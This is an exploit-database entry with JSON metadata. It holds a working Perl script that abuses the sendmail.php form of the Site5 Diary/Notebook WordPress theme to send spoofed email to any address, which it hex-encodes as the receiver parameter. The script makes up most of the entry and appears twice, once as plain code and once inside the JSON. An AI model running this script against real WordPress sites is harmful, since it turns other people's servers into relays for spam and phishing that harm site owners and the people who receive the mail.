ID 1337DAY-ID-18996 Type zdt Reporter bwall Modified 2012-07-16T00:00:00
Description
Exploit for php platform in category web applications
#!/usr/bin/perl
# Exploit Title: Diary/Notebook Site5 Wordpress Theme - Email Spoofing
# Date: 15.07.2012
# Exploit Author: @bwallHatesTwits
# Discovered by: @xxDigiPxx (http://www.ticktockcomputers.com/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing/)
# Software Link: http://www.wpdiarytheme.com/
# Vendor Homepage: http://www.site5.com/
# Others Possibly Vulnerable: http://www.site5.com/wordpress-themes/
# Version: Not Documented
# Tested on: Linux 3.2
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common qw{ POST };
#Change this to the root of the Wordpress
my $wordpress = 'http://localhost/wordpress/';
my $url = $wordpress.'wp-content/themes/diary/sendmail.php';
#Name shows up in the topic of the email (Website contact message from name)
my $name ='Proof of Concept';
#Sender email address
my $email = '[email protected]';
#Content of the email
my $comment = 'Email content';
#Receiver email address
my $receiver = '[email protected]';
$receiver =~ s/(.)/sprintf("%x",ord($1))/eg;
my $ua = LWP::UserAgent->new();
my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit', ] );
print "Sending request to $url\n";
my $content = $ua->request($request)->as_string();
print $content;
print "\nDone\nFollow \@BallastSec on Twitter\n";
# 0day.today [2018-04-06] #
{"published": "2012-07-16T00:00:00", "id": "1337DAY-ID-18996", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-04-06T01:48:10", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/BINOM3_LOGIN_CONFIG_PASS_DUMP", "MSF:AUXILIARY/SCANNER/HTTP/GIT_SCANNER", "MSF:AUXILIARY/SCANNER/HTTP/SYMANTEC_WEB_GATEWAY_LOGIN", "MSF:EXPLOIT/MULTI/HTTP/EATON_NSM_CODE_EXEC", "MSF:AUXILIARY/SCANNER/HTTP/CRAWLER", "MSF:EXPLOIT/MULTI/HTTP/QDPM_UPLOAD_EXEC", "MSF:EXPLOIT/MULTI/HTTP/PHP_VOLUNTEER_UPLOAD_EXEC", "MSF:EXPLOIT/WINDOWS/HTTP/EZSERVER_HTTP"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18996", "SECURITYVULNS:VULN:8627"]}], "modified": "2018-04-06T01:48:10", "rev": 2}, "vulnersScore": 0.2}, "type": "zdt", "lastseen": "2018-04-06T01:48:10", "edition": 2, "title": "Wordpress Diary/Notebook Site5 Theme Email Spoofing", "href": "https://0day.today/exploit/description/18996", "modified": "2012-07-16T00:00:00", "bulletinFamily": "exploit", "viewCount": 5, "cvelist": [], "sourceHref": "https://0day.today/exploit/18996", "references": [], "reporter": "bwall", "sourceData": "#!/usr/bin/perl\r\n# Exploit Title: Diary/Notebook Site5 Wordpress Theme - Email Spoofing\r\n# Date: 15.07.2012\r\n# Exploit Author: @bwallHatesTwits\r\n# Discovered by: @xxDigiPxx (http://www.ticktockcomputers.com/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing/)\r\n# Software Link: http://www.wpdiarytheme.com/\r\n# Vendor Homepage: http://www.site5.com/\r\n# Others Possibly Vulnerable: http://www.site5.com/wordpress-themes/\r\n# Version: Not Documented\r\n# Tested on: Linux 3.2\r\nuse strict;\r\nuse warnings;\r\n \r\nuse LWP::UserAgent;\r\nuse HTTP::Request::Common qw{ POST };\r\n \r\n#Change this to the root of the Wordpress\r\nmy $wordpress = 'http://localhost/wordpress/';\r\nmy $url = $wordpress.'wp-content/themes/diary/sendmail.php';\r\n \r\n#Name shows up in the topic of the email (Website contact message from name)\r\nmy $name ='Proof of Concept';\r\n \r\n#Sender email address\r\nmy $email = '[email\u00a0protected]';\r\n \r\n#Content of the email\r\nmy $comment = 'Email content';\r\n \r\n#Receiver email address\r\nmy $receiver = '[email\u00a0protected]';\r\n$receiver =~ s/(.)/sprintf(\"%x\",ord($1))/eg;\r\n \r\nmy $ua = LWP::UserAgent->new();\r\nmy $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit', ] );\r\nprint \"Sending request to $url\\n\";\r\nmy $content = $ua->request($request)->as_string();\r\nprint $content;\r\nprint \"\\nDone\\nFollow \\@BallastSec on Twitter\\n\";\r\n\r\n\n\n# 0day.today [2018-04-06] #"}
